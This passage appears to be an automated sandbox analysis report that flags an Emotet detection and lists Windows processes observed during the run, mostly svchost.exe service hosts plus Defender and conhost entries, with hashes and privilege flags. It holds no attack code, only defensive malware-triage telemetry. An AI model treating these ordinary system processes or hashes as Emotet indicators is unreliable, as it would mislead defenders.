                                                                                                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.1277310547.0000000000C51000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:56:20
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                          Imagebase:0x7ff7488e0000
                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:56:21
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                          Imagebase:0x7ff7488e0000
                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:56:31
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                                                          Imagebase:0x7ff7488e0000
                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:56:32
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                                                          Imagebase:0x7ff7488e0000
                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:56:32
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                                                                                          Imagebase:0x7ff7488e0000
                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:56:32
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                                                          Imagebase:0x7ff7488e0000
                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:56:33
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                                          Imagebase:0x7ff7488e0000
                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:56:34
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                                          Imagebase:0x7ff76db50000
                                                                                                                                                                                          File size:163336 bytes
                                                                                                                                                                                          MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:56:34
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                                                          Imagebase:0x7ff7488e0000
                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:56:37
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                          Imagebase:0x7ff7488e0000
                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:57:35
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                                                                                                          Imagebase:0x7ff708040000
                                                                                                                                                                                          File size:455656 bytes
                                                                                                                                                                                          MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:57:35
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:58:38
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                          Imagebase:0x7ff7488e0000
                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:18:00:37
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                          Imagebase:0x7ff7488e0000
                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:18:00:39
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wisvc
                                                                                                                                                                                          Imagebase:0x7ff7488e0000
                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                          Disassembly

                                                                                                                                                                                          Code Analysis

                                                                                                                                                                                          Reset < >